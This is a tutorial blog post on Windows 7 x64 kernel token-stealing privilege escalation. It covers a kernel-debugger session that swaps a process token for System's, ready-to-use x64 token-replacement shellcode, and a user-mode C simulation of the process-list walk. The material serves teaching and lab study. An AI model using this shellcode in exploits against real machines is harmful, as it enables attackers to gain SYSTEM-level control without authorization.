<h1>Token Replacement Privilege Escalation Experiment</h1>
<p>Published 2019-04-15, last modified 2019-08-23, at <a href="http://www.sinkland.cn/?p=220">http://www.sinkland.cn/?p=220</a>.</p>
<p>Token replacement (token stealing) is the most common final step in Windows kernel privilege escalation.</p>
<p>This post explains what a token is and how swapping a process's token pointer turns a kernel write primitive into an elevated shell.</p>
<p>First, a small test program. All it does is print a banner, wait for a keypress, and spawn a child cmd.exe.</p>
<pre><code class="language-c ">// RunCmd.exe

#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include "windows.h"

int main(void)
{
    printf("Before Run cmd ..\n");
    getchar();          // pause here so the token can be swapped from the kernel debugger

    system("cmd");      // the child cmd.exe inherits whatever primary token the parent has now
    return 0;
}
</code></pre>
<p>Why spawn a child process? Because after we replace the token in the kernel there is nothing in the parent's own window that shows its user has changed.</p>
<p>A child process, however, is created with a primary token derived from the parent's primary token at CreateProcess time. If the child cmd.exe reports a high-privilege user, the replacement succeeded.</p>
<p>Let us look at this program's token (Windows 7 x64, kernel debugger attached):</p>
<pre><code class="language-text ">// win7x64
kd&gt; !process 0 0
...
PROCESS fffffa8002276060
    SessionId: 1  Cid: 0274    Peb: 7efdf000  ParentCid: 0838
    DirBase: 785ad000  ObjectTable: fffff8a00b5d5530  HandleCount:  12.
    Image: RunCmd.exe

kd&gt; dt _EPROCESS fffffa8002276060 -d Token
nt!_EPROCESS
   +0x208 Token : _EX_FAST_REF

</code></pre>
<p>The Token field sits at offset 0x208 of _EPROCESS and is an _EX_FAST_REF, not a plain pointer. Read its value (only the first quadword is the Token field):</p>
<pre><code class="language-text ">kd&gt; dq fffffa8002276060 + 0x208
fffffa80`02276268  fffff8a0`07d333e8 00000000`00068031
</code></pre>
<p>Or, with the structure decoded:</p>
<pre><code class="language-text ">kd&gt;  dt _EX_FAST_REF 0xfffffa8002276060 + 0x208
nt!_EX_FAST_REF
   +0x000 Object           : 0xfffff8a0`07d333e8 Void
   +0x000 RefCnt           : 0y1000
   +0x000 Value            : 0xfffff8a0`07d333e8
</code></pre>
<p>The Value is <strong>0xfffff8a0`07d333e8</strong>.</p>
<p>Note that the low four bits of this value are not part of the pointer: _EX_FAST_REF stores a small cached reference count there (here 0y1000 = 8). The _TOKEN object is 16-byte aligned, so those bits are free for that purpose.</p>
<p>The real _TOKEN pointer is therefore the value with the low nibble masked off: <strong>fffff8a0`07d333e0</strong>.</p>
<pre><code class="language-text ">kd&gt; ? 0xfffff8a0`07d333e8 &amp; ffffffff`fffffff0
Evaluate expression: -8108766972960 = fffff8a0`07d333e0
</code></pre>
<hr />
<p>Now we can look at the token itself:</p>
<pre><code class="language-text ">kd&gt; dt _TOKEN fffff8a0`07d333e0
nt!_TOKEN
   +0x000 TokenSource      : _TOKEN_SOURCE
   +0x010 TokenId          : _LUID
   +0x018 AuthenticationId : _LUID
   +0x020 ParentTokenId    : _LUID
   +0x028 ExpirationTime   : _LARGE_INTEGER 0x7fffffff`ffffffff
   +0x030 TokenLock        : 0xfffffa80`03054880 _ERESOURCE
   +0x038 ModifiedId       : _LUID
   +0x040 Privileges       : _SEP_TOKEN_PRIVILEGES
   +0x058 AuditPolicy      : _SEP_AUDIT_POLICY
   +0x074 SessionId        : 1
   +0x078 UserAndGroupCount : 0xd
   +0x07c RestrictedSidCount : 0
   +0x080 VariableLength   : 0x264
   +0x084 DynamicCharged   : 0x400
   +0x088 DynamicAvailable : 0
   +0x08c DefaultOwnerIndex : 3
   +0x090 UserAndGroups    : 0xfffff8a0`07d336e8 _SID_AND_ATTRIBUTES
   +0x098 RestrictedSids   : (null) 
   +0x0a0 PrimaryGroup     : 0xfffff8a0`06ee56c0 Void
   +0x0a8 DynamicPart      : 0xfffff8a0`06ee56c0  -&gt; 0x501
   +0x0b0 DefaultDacl      : 0xfffff8a0`06ee56dc _ACL
   +0x0b8 TokenType        : 1 ( TokenPrimary )
   +0x0bc ImpersonationLevel : 0 ( SecurityAnonymous )
   +0x0c0 TokenFlags       : 0x2000
   +0x0c4 TokenInUse       : 0x1 ''
   +0x0c8 IntegrityLevelIndex : 0xc
   +0x0cc MandatoryPolicy  : 3
   +0x0d0 LogonSession     : 0xfffff8a0`01bf4830 _SEP_LOGON_SESSION_REFERENCES
   +0x0d8 OriginatingLogonSession : _LUID
   +0x0e0 SidHash          : _SID_AND_ATTRIBUTES_HASH
   +0x1f0 RestrictedSidHash : _SID_AND_ATTRIBUTES_HASH
   +0x300 pSecurityAttributes : 0xfffff8a0`02ee5a70 _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION
   +0x308 VariablePart     : 0xfffff8a0`07d337b8
</code></pre>
<p>Or, in the form the <code>!token</code> extension prints:</p>
<pre><code class="language-text ">kd&gt; !token fffff8a0`07d333e0
_TOKEN 0xfffff8a007d333e0
TS Session ID: 0x1
User: S-1-5-21-1071733736-4194771383-3987741639-500
User Groups: 
 00 S-1-5-21-1071733736-4194771383-3987741639-513
    Attributes - Mandatory Default Enabled 
 01 S-1-1-0
    Attributes - Mandatory Default Enabled 
 02 S-1-5-32-544
    Attributes - Mandatory Default Enabled Owner 
 03 S-1-5-32-545
    Attributes - Mandatory Default Enabled 
 04 S-1-5-4
    Attributes - Mandatory Default Enabled 
 05 S-1-2-1
    Attributes - Mandatory Default Enabled 
 06 S-1-5-11
    Attributes - Mandatory Default Enabled 
 07 S-1-5-15
    Attributes - Mandatory Default Enabled 
 08 S-1-5-5-0-90708
    Attributes - Mandatory Default Enabled LogonId 
 09 S-1-2-0
    Attributes - Mandatory Default Enabled 
 10 S-1-5-64-10
    Attributes - Mandatory Default Enabled 
 11 S-1-16-12288
    Attributes - GroupIntegrity GroupIntegrityEnabled 
Primary Group: S-1-5-21-1071733736-4194771383-3987741639-513
Privs: 
 05 0x000000005 SeIncreaseQuotaPrivilege          Attributes - 
 08 0x000000008 SeSecurityPrivilege               Attributes - 
 09 0x000000009 SeTakeOwnershipPrivilege          Attributes - 
 10 0x00000000a SeLoadDriverPrivilege             Attributes - 
 11 0x00000000b SeSystemProfilePrivilege          Attributes - 
 12 0x00000000c SeSystemtimePrivilege             Attributes - 
 13 0x00000000d SeProfileSingleProcessPrivilege   Attributes - 
 14 0x00000000e SeIncreaseBasePriorityPrivilege   Attributes - 
 15 0x00000000f SeCreatePagefilePrivilege         Attributes - 
 17 0x000000011 SeBackupPrivilege                 Attributes - 
 18 0x000000012 SeRestorePrivilege                Attributes - 
 19 0x000000013 SeShutdownPrivilege               Attributes - 
 20 0x000000014 SeDebugPrivilege                  Attributes - 
 22 0x000000016 SeSystemEnvironmentPrivilege      Attributes - 
 23 0x000000017 SeChangeNotifyPrivilege           Attributes - Enabled Default 
 24 0x000000018 SeRemoteShutdownPrivilege         Attributes - 
 25 0x000000019 SeUndockPrivilege                 Attributes - 
 28 0x00000001c SeManageVolumePrivilege           Attributes - 
 29 0x00000001d SeImpersonatePrivilege            Attributes - Enabled Default 
 30 0x00000001e SeCreateGlobalPrivilege           Attributes - Enabled Default 
 33 0x000000021 SeIncreaseWorkingSetPrivilege     Attributes - 
 34 0x000000022 SeTimeZonePrivilege               Attributes - 
 35 0x000000023 SeCreateSymbolicLinkPrivilege     Attributes - 
Authentication ID:         (0,162aa)
Impersonation Level:       Anonymous
TokenType:                 Primary
Source: User32             TokenFlags: 0x2000 ( Token in use )
Token ID: b269a9           ParentToken ID: 0
Modified ID:               (0, b26710)
RestrictedSidCount: 0      RestrictedSids: 0x0000000000000000
OriginatingLogonSession: 3e7
</code></pre>
<p>Reading this output: the user is RID 500 (the built-in Administrator account), it is a member of S-1-5-32-544 (Administrators) and runs at S-1-16-12288 (High integrity), but almost every privilege is present and disabled; only SeChangeNotifyPrivilege, SeImpersonatePrivilege and SeCreateGlobalPrivilege are enabled. The point of the swap below is not to enable these privileges but to replace the whole identity with System's.</p>
<h3>Replacing the pointer with System's</h3>
<pre><code class="language-text ">kd&gt; !process 0 0 System
PROCESS fffffa80018d0090
    SessionId: none  Cid: 0004    Peb: 00000000  ParentCid: 0000
    DirBase: 00187000  ObjectTable: fffff8a0000017f0  HandleCount: 487.
    Image: System

kd&gt; dq fffffa80018d0090 + 208
fffffa80`018d0298  fffff8a0`00004bb4 00000000`00000000
</code></pre>
<p>The System process's Token field (pointer plus cached reference count) is <strong>fffff8a0`00004bb4</strong>; masking the low nibble gives the _TOKEN object at fffff8a0`00004bb0.</p>
<p>Now perform the replacement, writing the System value over RunCmd's Token field:</p>
<pre><code class="language-text ">kd&gt; dq fffffa8002276060 + 208
fffffa80`02276268  fffff8a0`07d333e8 00000000`00068031

kd&gt; eq fffffa8002276060 + 208 fffff8a0`00004bb4

kd&gt; dq fffffa8002276060 + 208
fffffa80`02276268  fffff8a0`00004bb4 00000000`00068031

</code></pre>
<p>Note what this write does and does not do: it copies the whole _EX_FAST_REF, cached-reference nibble included, and it never releases RunCmd's original token. That original _TOKEN object is leaked, and when RunCmd eventually exits the kernel will drop a reference on the System token instead. The System token is referenced widely enough that this does not crash a lab machine, which is why real token-stealing payloads copy the value exactly like this; exploit code that cares about stability usually restores the original value after the elevated child has been spawned.</p>
<p>Now resume the target, press Enter in the RunCmd window, and in the child cmd.exe type:</p>
<pre><code class="language-text ">whoami
</code></pre>
<p>The child reports the System account, so the replacement worked:</p>
<p><img decoding="async" src="http://pic.sinkland.cn/cmd_system.jpg" alt="image" /></p>
<hr />
<p>For reference, here is an x64 token-replacement shellcode (MASM syntax) that does the same thing from inside the kernel: find the current _EPROCESS through the KPCR, walk ActiveProcessLinks until it reaches PID 4, and copy that process's Token field over the current one.</p>
<pre><code class="language-asm ">.CONST
    ; Windows 7 SP1 x64 Offsets
    KTHREAD_OFFSET     equ 188h   ; nt!_KPCR.Prcb.CurrentThread
    EPROCESS_OFFSET    equ 70h    ; nt!_KTHREAD.ApcState.Process
    SYSTEM_PID         equ 04h    ; SYSTEM Process PID
    FLINK_OFFSET       equ 188h   ; nt!_EPROCESS.ActiveProcessLinks.Flink
    PID_OFFSET         equ 180h   ; nt!_EPROCESS.UniqueProcessId
    TOKEN_OFFSET       equ 208h   ; nt!_EPROCESS.Token

.CODE
ShellcodeTokenReplace PROC
    push rcx
    push rdx

    xor rax, rax
    mov rax, gs:[rax + KTHREAD_OFFSET]      ; current _KTHREAD
    mov rax, [rax + EPROCESS_OFFSET]        ; current _EPROCESS

    mov rcx, rax                            ; rcx = our own _EPROCESS
    mov rdx, SYSTEM_PID

    SearchSystemPID:
        mov rax, [rax + FLINK_OFFSET]       ; next ActiveProcessLinks entry
        sub rax, FLINK_OFFSET               ; CONTAINING_RECORD -> _EPROCESS base
        cmp [rax + PID_OFFSET], rdx         ; UniqueProcessId == 4 ?
        jne SearchSystemPID

    mov rax, [rax + TOKEN_OFFSET]           ; System's _EX_FAST_REF, refcount nibble included
    mov [rcx + TOKEN_OFFSET], rax           ; overwrite our own Token field

    pop rdx
    pop rcx
    ret
ShellcodeTokenReplace ENDP

END
</code></pre>
<p>These offsets are specific to Windows 7 SP1 x64. On any other build, read them from the symbols before use, for example <code>dt nt!_EPROCESS UniqueProcessId ActiveProcessLinks Token</code> and <code>dt nt!_KTHREAD ApcState</code> in the kernel debugger.</p>
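<p>The following is an added example, not code from the original post: a user-mode C simulation of exactly the walk the shellcode above performs and of the _EX_FAST_REF decoding shown in the debugger session. It lays out fake _EPROCESS blocks with the Windows 7 SP1 x64 offsets the post uses, links them through ActiveProcessLinks the way the kernel does (Flink points at the neighbour's LIST_ENTRY, not at its base), and then steals the System token into the RunCmd block. The block size, the filler PID 0x1f0 and the filler token values are constructed for the demo; PIDs 4, 0x838 and 0x274 and the two real token values come from the post's debugger output. Nothing here touches a real kernel.</p>

```c
/* Added example, not code from the original post: a user-mode simulation of the
 * token-stealing walk the post's shellcode performs, run over constructed fake
 * _EPROCESS blocks laid out with the Windows 7 SP1 x64 offsets the post uses.
 * Block size, the filler PID and the filler token values are constructed. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PID_OFFSET    0x180   /* nt!_EPROCESS.UniqueProcessId          */
#define FLINK_OFFSET  0x188   /* nt!_EPROCESS.ActiveProcessLinks.Flink */
#define BLINK_OFFSET  0x190   /* nt!_EPROCESS.ActiveProcessLinks.Blink */
#define TOKEN_OFFSET  0x208   /* nt!_EPROCESS.Token (_EX_FAST_REF)     */
#define EPROCESS_SIZE 0x2a0   /* constructed: just big enough for the fields above */
#define SYSTEM_PID    4
#define NPROCS        4

/* _EX_FAST_REF packs a cached reference count into the low 4 bits of the
 * object pointer; the object is 16-byte aligned, so those bits are free. */
static uint64_t ex_fast_ref_object(uint64_t v) { return v & ~(uint64_t)0xF; }
static unsigned ex_fast_ref_refcnt(uint64_t v) { return (unsigned)(v & 0xF); }

static uint64_t rd64(const uint8_t *base, size_t off)
{
    uint64_t v; memcpy(&v, base + off, sizeof v); return v;
}
static void wr64(uint8_t *base, size_t off, uint64_t v)
{
    memcpy(base + off, &v, sizeof v);
}

/* Link the blocks into a circular ActiveProcessLinks list. As in the kernel,
 * Flink/Blink hold the address of the neighbour's LIST_ENTRY, not its base. */
static void link_processes(uint8_t *blocks, size_t n)
{
    for (size_t i = 0; i < n; i++) {
        uint8_t *cur  = blocks + i * EPROCESS_SIZE;
        uint8_t *next = blocks + ((i + 1) % n) * EPROCESS_SIZE;
        uint8_t *prev = blocks + ((i + n - 1) % n) * EPROCESS_SIZE;
        wr64(cur, FLINK_OFFSET, (uint64_t)(uintptr_t)(next + FLINK_OFFSET));
        wr64(cur, BLINK_OFFSET, (uint64_t)(uintptr_t)(prev + FLINK_OFFSET));
    }
}

/* The shellcode's SearchSystemPID loop: follow Flink, subtract the LIST_ENTRY
 * offset to get back to the _EPROCESS base (CONTAINING_RECORD), compare PIDs.
 * Unlike the shellcode, stop after one full lap so a missing PID cannot spin. */
static uint8_t *find_process_by_pid(uint8_t *current, uint64_t pid)
{
    uint8_t *p = current;
    do {
        p = (uint8_t *)(uintptr_t)rd64(p, FLINK_OFFSET) - FLINK_OFFSET;
        if (rd64(p, PID_OFFSET) == pid)
            return p;
    } while (p != current);
    return NULL;
}

/* Copy the whole _EX_FAST_REF, cached-reference nibble included, exactly as
 * the shellcode and the `eq` command in the post do. Returns the value
 * written, or 0 when no process has that PID (nothing is changed then). */
static uint64_t steal_token(uint8_t *current, uint64_t from_pid)
{
    uint8_t *src = find_process_by_pid(current, from_pid);
    if (src == NULL)
        return 0;
    uint64_t token = rd64(src, TOKEN_OFFSET);
    wr64(current, TOKEN_OFFSET, token);
    return token;
}

/* Build the constructed list (System first, RunCmd last, two fillers between)
 * and run the steal from RunCmd against target_pid. Returns RunCmd's new
 * token value, or 0 if the PID was not found. */
uint64_t demo_steal(uint64_t target_pid)
{
    static uint8_t blocks[NPROCS * EPROCESS_SIZE];
    /* PIDs 4, 0x838, 0x274 and the System/RunCmd token values come from the
     * post's debugger output; PID 0x1f0 and the middle two tokens are fillers. */
    const uint64_t pids[NPROCS]   = { SYSTEM_PID, 0x1f0, 0x838, 0x274 };
    const uint64_t tokens[NPROCS] = { 0xfffff8a000004bb4ULL, 0xfffff8a000100011ULL,
                                      0xfffff8a000200022ULL, 0xfffff8a007d333e8ULL };
    memset(blocks, 0, sizeof blocks);
    for (size_t i = 0; i < NPROCS; i++) {
        wr64(blocks + i * EPROCESS_SIZE, PID_OFFSET,   pids[i]);
        wr64(blocks + i * EPROCESS_SIZE, TOKEN_OFFSET, tokens[i]);
    }
    link_processes(blocks, NPROCS);

    uint8_t *runcmd = blocks + (NPROCS - 1) * EPROCESS_SIZE;
    uint64_t before = rd64(runcmd, TOKEN_OFFSET);
    uint64_t after  = steal_token(runcmd, target_pid);
    uint64_t now    = rd64(runcmd, TOKEN_OFFSET);
    printf("RunCmd token: %016llx -> %016llx (object %016llx, cached refs %u)\n",
           (unsigned long long)before, (unsigned long long)now,
           (unsigned long long)ex_fast_ref_object(now), ex_fast_ref_refcnt(now));
    return after;
}

int main(void)
{
    return demo_steal(SYSTEM_PID) == 0xfffff8a000004bb4ULL ? 0 : 1;
}
```

<p>Running it reproduces the debugger session: RunCmd's field goes from fffff8a0`07d333e8 (object fffff8a0`07d333e0, 8 cached references) to fffff8a0`00004bb4 (object fffff8a0`00004bb0, 4 cached references). The one deliberate difference from the shellcode is the bounded walk in <code>find_process_by_pid</code>: the assembly loops until it finds PID 4, which is fine on a real system where System always exists, but a simulation (or a payload aimed at a PID that may have exited) should stop after one lap rather than spin forever.</p>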